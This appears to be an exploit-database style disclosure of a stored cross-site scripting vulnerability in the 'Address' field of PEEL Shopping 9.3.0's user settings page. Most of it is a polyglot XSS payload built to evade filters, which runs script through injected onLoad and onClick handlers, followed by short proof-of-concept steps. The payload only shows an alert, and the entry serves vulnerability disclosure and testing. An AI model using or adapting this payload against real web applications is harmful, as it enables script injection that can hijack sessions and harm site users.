# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting# Date: 2021-02-11# Exploit Author: Anmol K Sachan# Vendor Homepage: https://www.peel.fr/# Software Link: https://sourceforge.net/projects/peel-shopping/# Software: : PEEL SHOPPING 9.3.0# Vulnerability Type: Stored Cross-site Scripting# Vulnerability: Stored XSS# Tested on Windows 10 XAMPP# This application is vulnerable to Stored XSS vulnerability.# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php# Vulnerable parameters: 'Address'# Payload used:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/**/oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
# POC: in the same page where we injected payload click on the text box to edit the address.# You will see your Javascript code (XSS) executed.
